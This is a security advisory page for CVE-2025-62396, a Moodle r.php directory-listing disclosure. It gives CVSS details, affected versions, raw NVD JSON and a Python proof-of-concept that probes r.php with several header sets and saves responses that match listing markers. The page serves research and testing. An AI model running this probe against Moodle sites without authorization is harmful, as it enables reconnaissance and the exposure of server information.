Security Vulnerability Report
CVE-2025-62396 CVSS 5.3 MEDIUM

CVE-2025-62396

Published: 2025-10-23 12:15:32
Last Modified: 2025-11-14 19:21:01

Description

An error-handling issue in the Moodle router (r.php) could cause the application to display internal directory listings when specific HTTP headers were not properly configured.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* (versionStartIncluding 4.5.0, versionEndExcluding 4.5.7) - VULNERABLE
cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* (versionStartIncluding 5.0.0, versionEndExcluding 5.0.3) - VULNERABLE
Moodle LMS 未知版本
建议关注Moodle官方安全公告获取具体受影响版本范围

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62396 Moodle Directory Listing Information Disclosure PoC
# Description: Error-handling issue in Moodle router (r.php) exposes internal directory listings
import requests
import sys

# Substrings whose presence in a 200/500 response body is taken as a sign of a
# directory listing or a dumped PHP structure.
# NOTE(review): "array" and "object" also occur in ordinary HTML/JavaScript, so
# a match is a lead to verify by reading the saved response, not confirmation.
_LISTING_MARKERS = (
    'index of',
    'directory listing',
    '<title>index of',
    'parent directory',
    '[tostring]',
    'array',
    'object',
)

# Header combinations sent, in this order, to r.php.
_HEADER_VARIANTS = (
    {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml',
    },
    {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary',
        'X-Requested-With': 'XMLHttpRequest',
    },
    {
        'Accept': 'application/json',
        'Content-Type': 'text/plain',
    },
)


def _looks_like_listing(response):
    """Return True when *response* has status 200 or 500 and its lower-cased body contains a marker."""
    if response.status_code not in (200, 500):
        return False
    body = response.text.lower()
    return any(marker in body for marker in _LISTING_MARKERS)


def _save_exchange(filename, headers, response):
    """Write the request headers, response headers and response body of one probe to *filename* (UTF-8)."""
    report = (
        "=== Request Headers ===\n"
        + str(headers) + "\n\n"
        + "=== Response Headers ===\n"
        + str(response.headers) + "\n\n"
        + "=== Response Body ===\n"
        + response.text
    )
    with open(filename, 'w', encoding='utf-8') as fh:
        fh.write(report)


def test_cve_2025_62396(target_url):
    """
    Probe a Moodle instance for CVE-2025-62396 (router directory-listing disclosure).

    Issues one GET to ``<target_url>/r.php?error=test`` per entry in
    ``_HEADER_VARIANTS`` (10 s timeout, redirects not followed). The first
    response that ``_looks_like_listing`` accepts is written to
    ``response_<i>.txt`` in the current directory and the function returns
    True; if no probe matches it returns False. A request error for one
    variant is printed and the next variant is tried.

    Args:
        target_url: Base URL of the Moodle site; a trailing slash is stripped.

    Returns:
        True if a response matched the listing markers, otherwise False.
    """
    print(f"[*] Testing target: {target_url}")
    # Target the Moodle router script
    endpoint = f"{target_url.rstrip('/')}/r.php"

    for index, headers in enumerate(_HEADER_VARIANTS, 1):
        print(f"\n[*] Test {index} with headers: {headers}")
        try:
            response = requests.get(
                endpoint,
                headers=headers,
                params={'error': 'test'},
                timeout=10,
                allow_redirects=False,
            )
            matched = _looks_like_listing(response)
        except requests.exceptions.RequestException as exc:
            print(f"[-] Request failed: {exc}")
            continue

        if not matched:
            continue

        print("[!] VULNERABLE! Directory listing may be exposed")
        print(f"[!] Response length: {len(response.text)} bytes")
        # Keep the full exchange so the hit can be checked by hand (see the
        # false-positive note on _LISTING_MARKERS). The name is fixed per
        # variant, so a rerun overwrites the previous file.
        filename = f"response_{index}.txt"
        _save_exchange(filename, headers, response)
        # NOTE(review): this message does not name the file it just wrote;
        # the path is response_<index>.txt in the current directory.
        print("[*] Response saved to (unknown)")
        return True

    print("\n[*] No obvious vulnerability indicators found")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-62396.py <target_url>")
        print("Example: python cve-2025-62396.py http://moodle.example.com")
        sys.exit(1)
    test_cve_2025_62396(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62396", "sourceIdentifier": "[email protected]", "published": "2025-10-23T12:15:31.913", "lastModified": "2025-11-14T19:21:00.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An error-handling issue in the Moodle router (r.php) could cause the application to display internal directory listings when specific HTTP headers were not properly configured."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-548"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.7", "matchCriteriaId": "5414437D-2D9C-4565-853F-EAF761F52E5E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "672DBB86-D5A8-41B6-B6F3-8E323E9C21F0"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-62396", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404429", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}